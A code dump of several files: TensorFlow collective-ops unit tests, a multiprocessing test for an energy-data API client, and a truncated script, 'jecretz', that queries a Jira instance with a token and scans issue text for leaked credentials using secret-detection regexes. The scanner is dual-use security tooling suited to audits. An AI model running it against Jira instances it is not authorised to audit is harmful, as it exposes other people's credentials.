tensor = constant_op.constant(inputs[i], dtype=(
dtypes.float16 if fp16 else dtypes.float32))
colred.append(
collective_ops.all_reduce(
tensor,
reported_group_size,
group_key,
instance_key,
merge_op,
final_op,
communication_hint=communication_hint,
timeout=timeout))
run_options = config_pb2.RunOptions()
if set_graph_key:
run_options.experimental.collective_graph_key = 1
results = sess.run(colred, options=run_options)
tolerance = 1e-3 if fp16 else 1e-5
for i in range(group_size):
logging.info('i {} result {} expected {}'.format(i, results[i], expected))
self.assertAllClose(results[i], expected, rtol=tolerance, atol=tolerance)
def _testMultipleConcurrentCollectiveReduce(self, t0, t1, expected):
group_key = 1
group_size = 2
num_instances = 2
all_reduces = []
config = config_pb2.ConfigProto(device_count={'CPU': group_size})
config.experimental.collective_deterministic_sequential_execution = True
with self.session(config=config) as sess:
for cpu in range(group_size):
with ops.device('/CPU:%d' % cpu):
in_tensor = constant_op.constant(t0 if cpu == 0 else t1)
for instance in range(num_instances):
all_reduces.append(collective_ops.all_reduce(
in_tensor, group_size, group_key, instance, 'Add', 'Div'))
results = sess.run(all_reduces)
for i in range(group_size * num_instances):
self.assertAllClose(results[i], expected, rtol=1e-5, atol=1e-5)
def testCollectiveReduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=True)
def testCollectiveAutoGraphKey(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=False)
def testFp16Reduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=True,
fp16=True)
def testCollectiveMultipleConcurrentReduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testMultipleConcurrentCollectiveReduce(
[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3],
[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2])
def testCollectiveTimeoutV1(self):
timeout = 4.5
kwargs = dict(
inputs=[[i + j + 0.1 for i in range(8)] for j in range(3)],
expected=[1 + i + 0.1 for i in range(8)],
set_graph_key=True,
timeout=timeout)
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(**kwargs)
start_time = time.time()
with ops.Graph().as_default():
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
self._testCollectiveReduce(
reported_group_size=len(kwargs['inputs']) + 1, **kwargs)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
@test_util.run_v2_only
def testCollectiveTimeoutV2(self):
timeout = 4.5
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
@def_function.function
def run_all_reduce(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1, 2, 3, 4]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/CPU:{}'.format(i)):
input_data = constant_op.constant(tensor)
collective_op = collective_ops.all_reduce(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
merge_op='Add',
final_op='Id',
timeout=timeout)
results.append(collective_op)
return results
run_all_reduce(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run_all_reduce(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
@test_util.run_v2_only
def testParamResolutionAfterTimeoutV2(self):
timeout = 1.5
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
group_key = 20
instance_key = 30
input_data = constant_op.constant([1, 2, 3, 4])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device('CPU:0'):
collective_ops.all_reduce(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
merge_op='Add',
final_op='Id',
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. Since the CPU:0 times out in the param resolution phase, CPU:1
# should times out as well, but in the execute phase.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device('CPU:1'):
collective_ops.all_reduce(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
merge_op='Add',
final_op='Id',
timeout=timeout)
def testNcclHintFallbackToRingReduce(self):
"""Tests that setting `communication_hint=nccl` works on non-GPU builds."""
if kernels.get_registered_kernels_for_op('NcclAllReduce'):
self.skipTest('Run only on non-GPU environments')
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]],
expected=[0.2, 1.2, 2.2, 3.2, 4.2, 5.2, 6.2, 7.2],
set_graph_key=False,
communication_hint='nccl')
def _testWhile(self, num_vars, num_iterations, key_base):
group_size = 2
group_key = 1
instances = [(key_base + i) for i in range(num_vars)]
devices = ['CPU:{}'.format(i) for i in range(group_size)]
config = config_pb2.ConfigProto(device_count={'CPU': group_size})
rewrite_options = config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce')
with self.session(config=config) as sess:
loop_vars = []
for device in devices:
with ops.device(device):
loop_vars.append(
[variables.VariableV1((1 << i) * 1.) for i in range(num_vars)])
# This variable controls number of iterations.
loop_vars.append(variables.VariableV1(0.))
def loop_body(dev0_tensors, dev1_tensors, loop_tensor):
return_ops = []
for i in range(len(devices)):
device = devices[i]
device_tensors = dev0_tensors if i == 0 else dev1_tensors
with ops.device(device):
device_collectives = []
for j in range(num_vars):
# NOTE(ayushd): we need the `cast` here to ensure that the input
# to `all_reduce` has an explicit device string. We don't use
# `identity` because `cast` is more resilient to getting optimized
# away by various optimization passes.
input_tensor = math_ops.cast(device_tensors[j], dtypes.float16)
collective_op = collective_ops.all_reduce(
input_tensor, group_size, group_key, instances[j],
'Add', 'Id')
output_tensor = math_ops.cast(collective_op, dtypes.float32)
device_collectives.append(output_tensor)
return_ops.append(device_collectives)
return_ops.append(math_ops.add(loop_tensor, 1.))
return return_ops
# Run until last variable exceeds number of iterations.
loop_cond = lambda d0, d1, i: math_ops.less(i, num_iterations)
sess.run(variables.global_variables_initializer())
results = sess.run(control_flow_ops.while_loop(loop_cond, loop_body,
loop_vars))
self.assertEqual(results[:-1], [
[((1 << (num_iterations + v)) * 1.) for v in range(num_vars)]
for _ in range(group_size)])
def testSimpleWhile(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testWhile(num_vars=1, num_iterations=4, key_base=20)
def testWhileMultipleAllReduce(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testWhile(num_vars=2, num_iterations=4, key_base=20)
def testWhileWithScopedAllocator(self):
group_size = 2
group_key = 1
instance_key0 = 1
instance_key1 = 2
config = config_pb2.ConfigProto(device_count={'CPU': group_size})
rewrite_options = config.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce')
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(config=config) as sess:
run_ops = []
for i in range(group_size):
with ops.device('CPU:%d' % i):
constant = constant_op.constant(0.)
cond = lambda i: math_ops.less(i, 10.)
body = lambda i: math_ops.add(i, 1.)
input0 = control_flow_ops.while_loop(cond, body, [constant])
input1 = math_ops.add(constant, 5)
colred0 = collective_ops.all_reduce(input0, group_size, group_key,
instance_key0, 'Add', 'Id')
colred1 = collective_ops.all_reduce(input1, group_size, group_key,
instance_key1, 'Add', 'Id')
run_ops.append(math_ops.add_n([colred0, colred1]))
results = sess.run(run_ops)
self.assertEqual(results, [30., 30.])
def testCollectiveReduceScalar(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(inputs=[0.1, 0.3], expected=0.2,
set_graph_key=True)
def testCollectiveReduceMaximum(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[1., 20., 3., 40., 5.], [10., 2., 30., 4., 50.]],
expected=[10., 20., 30., 40., 50.],
set_graph_key=True,
instance_key=30,
merge_op='Max',
final_op='Id')
def testCollectiveReduceMinimum(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveReduce(
inputs=[[1., 20., 3., 40., 5.], [10., 2., 30., 4., 50.]],
expected=[1., 2., 3., 4., 5.],
set_graph_key=True,
instance_key=40,
merge_op='Min',
final_op='Id')
def _testCollectiveBroadcast(self, in_val):
group_key = 1
instance_key = 1
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(in_val)
out0 = collective_ops.broadcast_send(in0, in0.shape, in0.dtype,
2, group_key, instance_key)
with ops.device('/CPU:1'):
c1 = constant_op.constant(in_val)
out1 = collective_ops.broadcast_recv(c1.shape, c1.dtype,
2, group_key, instance_key)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 1
results = sess.run([out0, out1], options=run_options)
self.assertAllClose(results[0], in_val, rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], in_val, rtol=1e-5, atol=1e-5)
def testCollectiveBroadcast(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveBroadcast([0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1])
def testCollectiveBroadcastBool(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveBroadcast([True, False])
def _testCollectiveGather(self, t0, t1, expected, set_graph_key):
group_key = 1
instance_key = 1
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_gather(in0, 2, group_key, instance_key)
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_gather(in1, 2, group_key, instance_key)
run_options = config_pb2.RunOptions()
if set_graph_key:
run_options.experimental.collective_graph_key = 1
results = sess.run([c0, c1], options=run_options)
self.assertAllClose(results[0], expected, rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], expected, rtol=1e-5, atol=1e-5)
def testCollectiveGather(self):
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
self._testCollectiveGather([0, 1, 2, 3, 4, 5, 6, 7],
[10, 11, 12, 13, 14, 15, 16, 17],
[0, 1, 2, 3, 4, 5, 6, 7,
10, 11, 12, 13, 14, 15, 16, 17],
True)
self._testCollectiveGather([[0, 1, 2, 3], [4, 5, 6, 7]],
[[10, 11, 12, 13], [14, 15, 16, 17]],
[[0, 1, 2, 3], [4, 5, 6, 7],
[10, 11, 12, 13], [14, 15, 16, 17]],
True)
self._testCollectiveGather([[[0, 1], [2, 3]], [[4, 5], [6, 7]]],
[[[10, 11], [12, 13]], [[14, 15], [16, 17]]],
[[[0, 1], [2, 3]], [[4, 5], [6, 7]],
[[10, 11], [12, 13]], [[14, 15], [16, 17]]],
True)
def testCollectiveGatherShapeMismatch(self):
group_key = 1
instance_key = 1
t0 = [1, 2, 3, 4]
t1 = [5, 6, 7, 8]
t2 = [9, 10]
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_gather(in0, 2, group_key, instance_key)
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
in2 = constant_op.constant(t2)
c1 = collective_ops.all_gather(in1, 2, group_key, instance_key)
c2 = collective_ops.all_gather(in2, 2, group_key, instance_key)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 1
sess.run([c0, c1], options=run_options)
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Shape mismatch'):
sess.run([c0, c2], options=run_options)
def testCollectiveGatherShapeMismatchAcrossDevices(self):
group_key = 1
instance_key = 1
t0 = [1, 2, 3, 4]
t1 = [5, 6]
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})) as sess:
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_gather(in0, 2, group_key, instance_key)
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_gather(in1, 2, group_key, instance_key)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 1
with self.assertRaisesRegex(errors.InvalidArgumentError,
'Shape mismatch'):
sess.run([c0, c1], options=run_options)
def testCollectiveGatherPolymorphicShape(self):
t0 = [0, 1, 2, 3, 4, 5, 6, 7]
t1 = [10, 11, 12, 13, 14, 15, 16, 17]
group_size = 2
group_key = 1
instance_key = 123
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(
config=config_pb2.ConfigProto(
device_count={'CPU': group_size})) as sess:
with ops.device('/CPU:0'):
in0 = array_ops.placeholder(dtype=dtypes.int32, shape=[None])
c0 = collective_ops.all_gather(in0, group_size, group_key,
instance_key)
with ops.device('/CPU:1'):
in1 = array_ops.placeholder(dtype=dtypes.int32, shape=[None])
c1 = collective_ops.all_gather(in1, group_size, group_key,
instance_key)
results = sess.run([c0, c1], feed_dict={in0: t0, in1: t1})
results_ = sess.run([c0, c1], feed_dict={in0: t0[1:], in1: t1[1:]})
expected_output = [0, 1, 2, 3, 4, 5, 6, 7, 10, 11, 12, 13, 14, 15, 16, 17]
self.assertAllClose(results[0], expected_output, rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], expected_output, rtol=1e-5, atol=1e-5)
expected_output_ = [1, 2, 3, 4, 5, 6, 7, 11, 12, 13, 14, 15, 16, 17]
self.assertAllClose(results_[0], expected_output_, rtol=1e-5, atol=1e-5)
self.assertAllClose(results_[1], expected_output_, rtol=1e-5, atol=1e-5)
@test_util.run_v2_only
def testCollectiveGroupSizeMismatch(self):
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
@def_function.function
def run_all_reduce():
group_key = 10
instance_key = 20
t0 = [1, 2, 3, 4]
t1 = [5, 6, 7, 8]
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_reduce(
in0, group_size=2, group_key=group_key, instance_key=instance_key,
merge_op='Add', final_op='Id')
with ops.device('/CPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_reduce(
in1, group_size=3, group_key=group_key, instance_key=instance_key,
merge_op='Add', final_op='Id')
return c0, c1
with self.assertRaisesRegex(errors.InternalError,
'but that group has size'):
run_all_reduce()
@test_util.run_v2_only
def testCollectiveTensorsHaveNoDeviceSpecified(self):
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
group_size = 2
group_key = 1
instance_key = 1
@def_function.function
def fn(all_args):
results = []
# The inputs have no devices set. This is expected to be a trace-time
# check only.
self.assertEqual(all_args[0].device, '')
self.assertEqual(all_args[1].device, '')
with ops.device('/CPU:0'):
results.append(
collective_ops.all_reduce(all_args[0], group_size, group_key,
instance_key, 'Add', 'Div'))
with ops.device('/CPU:1'):
results.append(
collective_ops.all_reduce(all_args[1], group_size, group_key,
instance_key, 'Add', 'Div'))
return results
with ops.device('/CPU:0'):
in0 = constant_op.constant(1)
with ops.device('/CPU:1'):
in1 = constant_op.constant(3)
result = fn([in0, in1])
self.assertAllClose(result, [2, 2])
@test_util.run_v2_only
def testCollectiveGroupSizeOne(self):
group_size = 1
group_key = 100
instance_key = 100
in_value = [1, 2, 3, 4]
in_tensor = constant_op.constant(in_value)
reduced_tensor = collective_ops.all_reduce(
in_tensor, group_size, group_key, instance_key, 'Add', 'Id')
self.assertAllEqual(in_value, reduced_tensor.numpy())
gathered_tensor = collective_ops.all_gather(
in_tensor, group_size, group_key, instance_key)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testConstantWithScopedAllocator(self):
group_size = 2
group_key = 1
instance_key1 = 1
instance_key2 = 2
graph_options = config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(do_constant_folding=True))
cfg = config_pb2.ConfigProto(device_count={'CPU': group_size},
graph_options=graph_options)
rewrite_options = cfg.graph_options.rewrite_options
rewrite_options.scoped_allocator_optimization = (
rewriter_config_pb2.RewriterConfig.ON)
del rewrite_options.scoped_allocator_opts.enable_op[:]
rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce')
# Tests that execute collectives need to be enclosed in graph or tf.function
with ops.Graph().as_default():
with self.session(config=cfg) as sess:
run_ops = []
for i in range(group_size):
with ops.device('CPU:%d' % i):
constant = constant_op.constant(i + 1.)
input_tensor1 = array_ops.identity(constant)
input_tensor2 = array_ops.identity(constant)
reduced_tensor1 = collective_ops.all_reduce(
input_tensor1, group_size, group_key, instance_key1, 'Add',
'Id')
reduced_tensor2 = collective_ops.all_reduce(
input_tensor2, group_size, group_key, instance_key2, 'Add',
'Id')
run_ops.append(array_ops.identity(reduced_tensor1))
run_ops.append(array_ops.identity(reduced_tensor2))
results = sess.run(run_ops)
self.assertEqual(results, [3., 3., 3., 3.])
@test_util.run_v2_only
def testMultipleGroups(self):
cpus = config.list_physical_devices('CPU')
self.assertEqual(len(cpus), 1)
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
context.ensure_initialized()
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [group_key for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/CPU:{}'.format(device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(collective_ops.all_reduce(
input_tensor, group_size, group_key, instance_key, merge_op='Add',
final_op='Id'))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[group_key * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@test_util.run_v2_only
def testAbortGroupParamsResolution(self):
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# Reset the context in order to reset the collective executor.
context._reset_context() # pylint: disable=protected-access
t.join()
# After reset non-NCCL collectives should work.
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def collective_fn():
for device in ['CPU:0', 'CPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='ring')
def_function.function(collective_fn)()
@test_util.run_v2_only
def testAbortInstanceParamsResolution(self):
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
def collective_fn():
for device in ['CPU:0', 'CPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='ring')
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# Reset the context in order to reset the collective executor.
context._reset_context() # pylint: disable=protected-access
t.join()
# After reset non-NCCL collectives should work.
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def_function.function(collective_fn)()
@test_util.run_v2_only
def testAbortRing(self):
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
# First perform a normal collective to finish resolution.
def collective_fn():
for device in ['CPU:0', 'CPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='ring')
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key,
'Add', 'Id')
# Reset the context in order to reset the collective executor.
t.join()
context._reset_context() # pylint: disable=protected-access
# After reset non-NCCL collectives should work.
cpus = config.list_physical_devices('CPU')
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
def_function.function(collective_fn)()
if __name__ == '__main__':
test.main()
|
test_multiprocessing.py
|
import os
import logging
from multiprocessing import Process
from enverus_direct_access import DirectAccessV2
from tests.utils import set_token
set_token()
LOG_LEVEL = logging.DEBUG
if os.environ.get("GITHUB_SHA"):
LOG_LEVEL = logging.ERROR
DIRECTACCESS_API_KEY = os.environ.get("DIRECTACCESS_API_KEY")
DIRECTACCESS_CLIENT_ID = os.environ.get("DIRECTACCESS_CLIENT_ID")
DIRECTACCESS_CLIENT_SECRET = os.environ.get("DIRECTACCESS_CLIENT_SECRET")
DIRECTACCESS_TOKEN = os.environ.get("DIRECTACCESS_TOKEN")
def query(endpoint, access_token, **options):
"""
Query method target for multiprocessing child processes.
:param endpoint: a valid Direct Access API dataset endpoint
:param access_token: a Direct Access API access token
:param options: kwargs of valid query parameters for the dataset endpoint
:return:
"""
client = DirectAccessV2(
api_key=DIRECTACCESS_API_KEY,
client_id=DIRECTACCESS_CLIENT_ID,
client_secret=DIRECTACCESS_CLIENT_SECRET,
retries=5,
backoff_factor=5,
access_token=access_token,
log_level=LOG_LEVEL,
)
resp = client.query(endpoint, **options)
next(resp)
assert resp
return
def test_multiple_processes():
"""
Launch two child processes, one for rigs and one for permits.
:return:
"""
procs = list()
a = Process(
target=query, kwargs=dict(endpoint="rigs", access_token=DIRECTACCESS_TOKEN)
)
procs.append(a)
b = Process(
target=query, kwargs=dict(endpoint="permits", access_token=DIRECTACCESS_TOKEN)
)
procs.append(b)
[x.start() for x in procs]
[x.join() for x in procs]
return
|
jecretz.py
|
#!/usr/bin/env python3
import argparse
import requests
import re
import os
import sys
import json
import itertools
from rules import custom_rules
from keywords import search_keywords
from textwrap3 import wrap
from queue import Queue
from threading import Thread
from terminaltables import AsciiTable
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
from truffleHogRegexes.regexChecks import regexes
issues = []
fetched_issues = {}
search_queue = Queue(maxsize = 0)
task_queue = Queue(maxsize = 0)
results = {}
def request_session():
session = requests.Session()
retries = Retry(total = 5, backoff_factor = 0.1, status_forcelist = [500, 502, 503, 504])
session.mount('http://', HTTPAdapter(max_retries = retries))
session.mount('https://', HTTPAdapter(max_retries = retries))
return session
def get_token():
try:
with open('config.json', 'r') as file:
config = json.load(file)
return config['token']
except:
print("[-] Authorization token required")
sys.exit(0)
def search(url, keyword, token, issueList = []):
jql_query = 'text ~ "'+keyword+'"'
headers = {'Authorization': token, 'X-Atlassian-Token': 'no-check'}
data = {'startIndex': 0, 'jql': jql_query, 'layoutKey': 'split-view'}
url = url + '/rest/issueNav/1/issueTable'
sys.stdout.write('\r => ' + str(keyword))
sys.stdout.flush()
req = request_session()
try:
response = req.post(url, data=data, headers=headers)
json_response = response.json()
try:
for item in json_response["issueTable"]["issueKeys"]:
issueList.append(item)
except:
print("\n[-] " + keyword + " didn't return any results")
except:
print("\n[-] Something went wrong. Check your auth token. Some-times this could be due to Okta/SSO.")
return issueList
def fetch_issues(url, issueId, token):
issue_details = {"description": "", "comments": []}
comments = []
headers = {'Authorization': token, 'X-Atlassian-Token': 'no-check'}
params = {'fields': ['description', 'comment', 'created' ,'updated']}
url = url + '/rest/api/2/issue/' + issueId
sys.stdout.write('\r => ' + issueId)
sys.stdout.flush()
req = request_session()
try:
response = req.get(url, params=params, headers=headers)
json_response = response.json()
try:
issue_details["description"] = json_response["fields"]["description"]
for comment in json_response["fields"]["comment"]["comments"]:
comments.append(comment["body"])
issue_details["comments"] = comments
except:
print("\n[-] Error fetching issue " + issueId)
except:
print("\n[-] Error reaching Jira. Skipping " + issueId)
return issue_details
def flatten_list(array):
for items in array:
for element in items:
yield element
def check_credentials():
rules = regexes.copy()
rules.update(custom_rules)
for item in fetched_issues:
sys.stdout.write('\r => ' + item)
sys.stdout.flush()
output = {}
comments = []
description = fetched_issues[item]["description"]
for comment in fetched_issues[item]["comments"]:
comments.append(comment)
d_match = []
c_match = []
for rule in rules:
pattern = re.compile(rules[rule])
d_match.append(pattern.findall(str(description), re.UNICODE))
for comment in comments:
c_match.append(pattern.findall(str(comment), re.UNICODE))
output["description"] = list(flatten_list(d_match))
output["comments"] = list(flatten_list(c_match))
results[item] = output
def display_results(results, save, out = None):
table_data = []
table_data.append(['Issue ID', 'Description', 'Comments'])
table = AsciiTable(table_data)
max_width = table.column_max_width(1)
align_width = int(max_width/2)
for result in results:
description = results[result]["description"]
comments = results[result]["comments"]
if not description and not comments:
continue
if not description:
description = "--"
if not comments:
comments = "--"
if len(str(description)) > align_width:
description = '\n'.join(wrap(str(description), align_width))
if len(str(comments)) > align_width:
comments = '\n'.join(wrap(str(comments), align_width))
table.table_data.append([result, description, comments])
table.inner_row_border = True
print(table.table)
print("[+] Returned " + str(len(table.table_data) - 1) + " items\n")
if save:
output = "\n[+] Jecretz Results\n\n" + table.table + "\n\n[+] Returned " + str(len(table.table_data) - 1) + " items\n\n"
with open(out, "w") as file:
file.write(output)
def search_worker(url, token):
while True:
keyword = search_queue.get()
if not keyword:
break
search(url, keyword, token, issues)
search_queue.task_done()
def task_worker(url, token):
while True:
issueId = task_queue.get()
details = fetch_issues(url, issueId, token)
fetched_issues[issueId] = details
task_queue.task_done()
def start_thread(worker, url, token, threads):
for i in range(threads):
thread = Thread(target=worker, args = (url, token))
thread.daemon = True
thread.start()
def main():
argparser = argparse.ArgumentParser(description = 'Jecretz, Jira Secrets Hunter')
argparser.add_argument('-u', '--url', help = 'jira instance url, eg: https://jira.domain.tld/', required = True)
argparser.add_argument('-t', '--threads', metavar = 'threads', default = 10, help = 'default: 10', type = int)
argparser.add_argument('-o', '--out', metavar = 'file', help = 'file to save output to, eg: -o output.txt')
args = argparser.parse_args()
if args.url.endswith('/'):
